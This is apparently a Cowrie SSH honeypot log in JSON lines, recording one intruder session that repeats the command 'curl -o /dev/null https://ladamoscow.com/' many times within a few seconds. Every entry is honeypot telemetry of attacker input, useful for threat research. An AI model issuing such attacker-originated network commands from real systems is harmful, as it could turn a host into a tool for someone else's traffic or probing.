{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.838332Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.877031Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.878294Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.927656Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.928699Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.969250Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.971370Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.022224Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.023373Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.075381Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.076465Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.114502Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.115672Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.152204Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.153219Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.200105Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.201253Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.243045Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.244413Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.280992Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.282087Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.318975Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.320014Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.357270Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.358114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.395348Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.396257Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.434029Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.434916Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.472221Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.473199Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.510147Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.511060Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.547553Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.548510Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.595750Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.596762Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.633418Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.634340Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.671125Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.672241Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.708660Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.709519Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.746321Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.747189Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.784399Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.785311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.821544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.822348Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.863770Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.864756Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.901311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.902077Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.939528Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.940416Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:14.995578Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:14.996712Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.046690Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.047606Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.085213Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.086090Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.135391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.136448Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.173012Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.173863Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.211062Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.211915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.252076Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.253238Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.289882Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.291123Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.328082Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.328947Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.365543Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.366333Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.413138Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.413953Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.450521Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.451377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.487865Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.488686Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.524944Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.525838Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.562169Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.562819Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.600515Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.601377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.637789Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.638748Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.680977Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.682127Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.718772Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.719590Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.755845Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.756701Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.803432Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.804534Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.841540Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.842542Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.879317Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.880254Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.924602Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.925557Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:15.970031Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:15.971078Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.007958Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.008918Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.049587Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.050683Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.098593Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.099518Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.149999Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.151153Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.196864Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.197792Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.261666Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.262791Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.302814Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.303921Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.342394Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.343313Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.386846Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.387750Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.454720Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.455928Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.493111Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.494016Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.539933Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.540889Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.580842Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
